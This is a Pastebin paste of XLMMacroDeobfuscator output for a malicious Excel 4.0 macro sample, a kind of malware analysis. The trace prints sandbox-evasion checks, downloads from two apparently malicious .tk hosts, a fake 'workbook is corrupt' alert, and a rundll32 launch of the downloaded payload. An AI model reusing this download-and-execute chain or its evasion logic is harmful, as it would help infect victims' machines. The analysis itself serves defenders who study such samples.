API tools faq
paste
Advertisement
dissectmalware

XLM deobfuscation - MID function

dissectmalware
May 20th, 2020
711
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.99 KB | None | 0 0
raw download clone embed print report
  1. pip install -U https://github.com/DissectMalware/XLMMacroDeobfuscator/archive/master.zip
  2. Hash: fa2b9bbfdd4930a5db55dc42e0cdbb3ee31539021f2dae588bcb61b0ebe6b189
  3. [Loading Cells]
  4. auto_open: auto_open->C9Nh5oESJrL7acc7MrbLK3jf8r35YV!$HO$18358
  5. [Starting Deobfuscation]
  6. CELL:HO18358 , FullEvaluation ,SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AN46618," !""#$%&'()*+,-./01")
  7. CELL:HO18359 , FullEvaluation ,GOTO(AE64869)
  8. CELL:AE64869 , FullEvaluation ,SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BT58881,"23456789:;<=>?@ABCD")
  9. CELL:AE64870 , FullEvaluation ,RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AD34266)
  10. CELL:AD34266 , FullEvaluation ,SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!HQ17800,"EFGHIJKLMNOPQRSTUVW")
  11. CELL:AD34267 , FullEvaluation ,GOTO(EJ28171)
  12. CELL:EJ28171 , FullEvaluation ,SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!HU8314,"XYZ[\]^_`abcdefghij")
  13. CELL:EJ28172 , FullEvaluation ,GOTO(DG7150)
  14. CELL:DG7150 , FullEvaluation ,SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IA48760,"klmnopqrstuvwxyz{|}")
  15. CELL:DG7151 , FullEvaluation ,GOTO(G56331)
  16. CELL:G56331 , FullEvaluation ,FORMULA("=CLOSE(FALSE)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IS50994)
  17. CELL:G56332 , FullEvaluation ,RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!L48127)
  18. CELL:L48127 , FullEvaluation ,FORMULA("=APP.MAXIMIZE()",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!L48128)
  19. CELL:L48128 , NotImplemented ,APP.MAXIMIZE()
  20. CELL:L48129 , FullEvaluation ,RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AP59590)
  21. CELL:AP59590 , FullEvaluation ,FORMULA("=IF(GET.WINDOW(7),GOTO(R[-8597]C[211]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AP59591)
  22. CELL:AP59591 , FullEvaluation ,IF(GET.WINDOW(7),GOTO(R[-8597]C[211]),)
  23. CELL:AP59592 , FullEvaluation , GOTO(FP60809)
  24. CELL:FP60809 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-9816]C[81]))",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FP60810)
  25. CELL:FP60810 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-9816]C[81]))
  26. CELL:FP60811 , FullEvaluation , GOTO(IC65396)
  27. CELL:IC65396 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[-14403]C[16]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IC65397)
  28. CELL:IC65397 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[-14403]C[16]),)
  29. CELL:IC65398 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GU7152)
  30. CELL:GU7152 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[43841]C[50]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GU7153)
  31. CELL:GU7153 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[43841]C[50]),)
  32. CELL:GU7154 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!DT3410)
  33. CELL:DT3410 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[47583]C[129]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!DT3411)
  34. CELL:DT3411 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[47583]C[129]),)
  35. CELL:DT3411 , FullEvaluation , [TRUE] GOTO(R[47583]C[129])
  36. CELL:IS50994 , End , CLOSE(FALSE)
  37. CELL:DT3411 , FullEvaluation , [FALSE]
  38. CELL:DT3412 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CM35853)
  39. CELL:CM35853 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[15140]C[162]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CM35854)
  40. CELL:CM35854 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[15140]C[162]),)
  41. CELL:CM35854 , FullEvaluation , [TRUE] GOTO(R[15140]C[162])
  42. CELL:IS50994 , End , CLOSE(FALSE)
  43. CELL:CM35854 , FullEvaluation , [FALSE]
  44. CELL:CM35855 , FullEvaluation , GOTO(CK51623)
  45. CELL:CK51623 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[-630]C[164]))",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CK51624)
  46. CELL:CK51624 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-630]C[164]))
  47. CELL:CK51625 , FullEvaluation , GOTO(FP50981)
  48. CELL:FP50981 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[12]C[81]))",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FP50982)
  49. CELL:FP50982 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[12]C[81]))
  50. CELL:FP50983 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CK61340)
  51. CELL:CK61340 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-10347]C[164]))",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CK61341)
  52. CELL:CK61341 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-10347]C[164]))
  53. CELL:CK61342 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IA40525)
  54. CELL:IA40525 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!DE20419)
  55. CELL:IA40526 , FullEvaluation , GOTO(DZ43796)
  56. CELL:DZ43796 , FullEvaluation , FORMULA("=""C:\Users\Public\ohzMz.reg""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!EY35234)
  57. CELL:DZ43797 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IU37484)
  58. CELL:IU37484 , FullEvaluation , FORMULA("=R[-9767]C[-115]&GET.WORKSPACE(2)&""\Excel\Security ""&R[5048]C[-69]&"" /y""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!HP30186)
  59. CELL:IU37485 , FullEvaluation , GOTO(BF24402)
  60. CELL:BF24402 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BQ53153)
  61. CELL:BF24403 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CF44918)
  62. CELL:CF44918 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[8234]C[-15],R[-14733]C[140],0,5)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CF44919)
  63. CELL:CF44919 , NotImplemented , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",35152GET.WORKSPACE(2)\Excel\Security O49967 /y,0,5)
  64. CELL:CF44920 , FullEvaluation , GOTO(FV65441)
  65. CELL:FV65441 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[-30210]C[-23])))",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FV65444)
  66. CELL:FV65442 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FV65445)
  67. CELL:FV65443 , FullEvaluation , FORMULA("=NEXT()",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FV65446)
  68. CELL:FV65444 , PartialEvaluation , WHILE("C:\Users\Public\ohzMz.reg")
  69. CELL:FV65445 , PartialEvaluation , WAIT(NOW()+"00:00:01")
  70. CELL:FV65446 , PartialEvaluation , NEXT()
  71. CELL:FV65447 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AA60042)
  72. CELL:AA60042 , FullEvaluation , FORMULA("=FOPEN(R[-24809]C[128])",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AA60043)
  73. CELL:AA60043 , PartialEvaluation , FOPEN("C:\Users\Public\ohzMz.reg")
  74. CELL:AA60044 , FullEvaluation , GOTO(AY30021)
  75. CELL:AY30021 , FullEvaluation , FORMULA("=FPOS(R[30021]C[-24],215)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AY30022)
  76. CELL:AY30022 , PartialEvaluation , FPOS("""C:\Users\Public\ohzMz.reg""",215)
  77. CELL:AY30023 , FullEvaluation , GOTO(HD22993)
  78. CELL:HD22993 , FullEvaluation , FORMULA("=FREAD(R[37049]C[-185],255)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!HD22994)
  79. CELL:HD22994 , PartialEvaluation , FREAD("""C:\Users\Public\ohzMz.reg""",255)
  80. CELL:HD22995 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GM60823)
  81. CELL:GM60823 , FullEvaluation , FORMULA("=FCLOSE(R[-781]C[-168])",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GM60824)
  82. CELL:GM60824 , PartialEvaluation , FCLOSE("""C:\Users\Public\ohzMz.reg""")
  83. CELL:GM60825 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IF51216)
  84. CELL:IF51216 , FullEvaluation , FORMULA("=FILE.DELETE(R[-15983]C[-85])",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IF51217)
  85. CELL:IF51217 , NotImplemented , FILE.DELETE(R[-15983]C[-85])
  86. CELL:IF51218 , FullEvaluation , GOTO(AE21772)
  87. CELL:AE21772 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[1221]C[181])),GOTO(R[29221]C[222]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AE21773)
  88. CELL:AE21773 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[1221]C[181])),GOTO(R[29221]C[222]),)
  89. CELL:AE21774 , FullEvaluation , GOTO(GO59474)
  90. CELL:GO59474 , FullEvaluation , FORMULA("=""C:\Users\Public\Qrr8oK.html""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!HK34324)
  91. CELL:GO59475 , FullEvaluation , GOTO(HL30814)
  92. CELL:HL30814 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IR33228)
  93. CELL:HL30815 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FV57194)
  94. CELL:FV57194 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-23967]C[74],R[-22871]C[41],0,0)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FV57195)
  95. CELL:FV57195 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\Qrr8oK.html",0,0)
  96. CELL:FV57196 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GB55099)
  97. CELL:GB55099 , FullEvaluation , FORMULA("=FILES(R[-20776]C[35])",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GB55100)
  98. CELL:GB55100 , PartialEvaluation , FILES("C:\Users\Public\Qrr8oK.html")
  99. CELL:GB55101 , FullEvaluation , GOTO(AV15376)
  100. CELL:AV15376 , FullEvaluation , FORMULA("=IF(ISERROR(R[39723]C[136]),GOTO(R[35617]C[205]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AV15377)
  101. CELL:AV15377 , FullBranching , IF(ISERROR(R[39723]C[136]),GOTO(R[35617]C[205]),)
  102. CELL:AV15377 , FullEvaluation , [TRUE] GOTO(R[35617]C[205])
  103. CELL:IS50994 , End , CLOSE(FALSE)
  104. CELL:AV15377 , FullEvaluation , [FALSE]
  105. CELL:AV15378 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FQ29573)
  106. CELL:FQ29573 , FullEvaluation , SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!DK40785,"klmnopqrstuvwxyz{|}")
  107. CELL:FQ29574 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!EA17260)
  108. CELL:EA17260 , FullEvaluation , SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FU2407,"XYZ[\]^_`abcdefghij")
  109. CELL:EA17261 , FullEvaluation , GOTO(CH48519)
  110. CELL:CH48519 , FullEvaluation , SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!EM11199,"EFGHIJKLMNOPQRSTUVW")
  111. CELL:CH48520 , FullEvaluation , GOTO(GQ8435)
  112. CELL:GQ8435 , FullEvaluation , SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CL18870,"23456789:;<=>?@ABCD")
  113. CELL:GQ8436 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FU27428)
  114. CELL:FU27428 , FullEvaluation , SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!DT34576," !""#$%&'()*+,-./01")
  115. CELL:FU27429 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IR50328)
  116. CELL:IR50328 , FullEvaluation , FORMULA("=""C:\Users\Public\BgAlTgIN.html""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CX30111)
  117. CELL:IR50329 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FB21194)
  118. CELL:FB21194 , FullEvaluation , FORMULA("=""https://clicmiscentfrussoting.tk/wp-keys.php""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AU61789)
  119. CELL:FB21195 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CV12822)
  120. CELL:CV12822 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-2855]C[-190],R[-34533]C[-135],0,0)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IC64644)
  121. CELL:CV12823 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FZ59938)
  122. CELL:FZ59938 , FullEvaluation , FORMULA("=FILES(R[-23363]C[-77])",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FW53474)
  123. CELL:FZ59939 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!J1196)
  124. CELL:J1196 , FullEvaluation , FORMULA("=IF(ISERROR(R[-3734]C[41]),,RUN(R[-889]C[-81]))",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!EH57208)
  125. CELL:J1197 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!DL26975)
  126. CELL:DL26975 , FullEvaluation , FORMULA("=""https://riesperetidtur.tk/wp-keys.php""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GO31937)
  127. CELL:DL26976 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CQ22758)
  128. CELL:CQ22758 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-24140]C[-48],R[-25966]C[-143],0,0)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IK56077)
  129. CELL:CQ22759 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AV5044)
  130. CELL:AV5044 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CF52828)
  131. CELL:AV5045 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CZ22389)
  132. CELL:CZ22389 , FullEvaluation , FORMULA("=ALERT(R[-3491]C[27])",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BE56319)
  133. CELL:CZ22390 , FullEvaluation , GOTO(GS26315)
  134. CELL:GS26315 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FJ56471)
  135. CELL:GS26316 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BH17087)
  136. CELL:BH17087 , FullEvaluation , FORMULA("=R[-12030]C[35]&"",DllRegisterServer""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BO42141)
  137. CELL:BH17088 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CB18063)
  138. CELL:CB18063 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[2749]C[1],R[-11581]C[-98],0,5)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FI53722)
  139. CELL:CB18064 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IC64644)
  140. CELL:IC64644 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://clicmiscentfrussoting.tk/wp-keys.php","C:\Users\Public\BgAlTgIN.html",0,0)
  141. CELL:IC64645 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FW53474)
  142. CELL:FW53474 , PartialEvaluation , FILES("C:\Users\Public\BgAlTgIN.html")
  143. CELL:FW53475 , FullEvaluation , GOTO(EH57208)
  144. CELL:EH57208 , FullBranching , IF(ISERROR(R[-3734]C[41]),,RUN(R[-889]C[-81]))
  145. CELL:EH57208 , FullEvaluation , [TRUE]
  146. CELL:EH57209 , FullEvaluation , GOTO(GO31937)
  147. CELL:GO31937 , FullEvaluation , "https://riesperetidtur.tk/wp-keys.php"
  148. CELL:GO31938 , FullEvaluation , GOTO(IK56077)
  149. CELL:IK56077 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://riesperetidtur.tk/wp-keys.php""","C:\Users\Public\BgAlTgIN.html",0,0)
  150. CELL:IK56078 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CF52828)
  151. CELL:CF52828 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  152. CELL:CF52829 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BE56319)
  153. CELL:BE56319 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
  154. CELL:BE56320 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FJ56471)
  155. CELL:FJ56471 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  156. CELL:FJ56472 , FullEvaluation , GOTO(BO42141)
  157. CELL:BO42141 , FullEvaluation , C:\Users\Public\BgAlTgIN.html,DllRegisterServer
  158. CELL:BO42142 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FI53722)
  159. CELL:FI53722 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\BgAlTgIN.html,DllRegisterServer",0,5)
  160. CELL:FI53723 , FullEvaluation , GOTO(IS50994)
  161. CELL:IS50994 , End , CLOSE(FALSE)
  162. CELL:EH57208 , FullEvaluation , [FALSE] RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BE56319)
  163. CELL:BE56319 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  164. CELL:BE56320 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FJ56471)
  165. CELL:FJ56471 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  166. CELL:FJ56472 , FullEvaluation , GOTO(BO42141)
  167. CELL:BO42141 , FullEvaluation , C:\Users\Public\BgAlTgIN.html,DllRegisterServer
  168. CELL:BO42142 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FI53722)
  169. CELL:FI53722 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\BgAlTgIN.html,DllRegisterServer",0,5)
  170. CELL:FI53723 , FullEvaluation , GOTO(IS50994)
  171. CELL:IS50994 , End , CLOSE(FALSE)
  172. time elapsed: 5.211049795150757
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!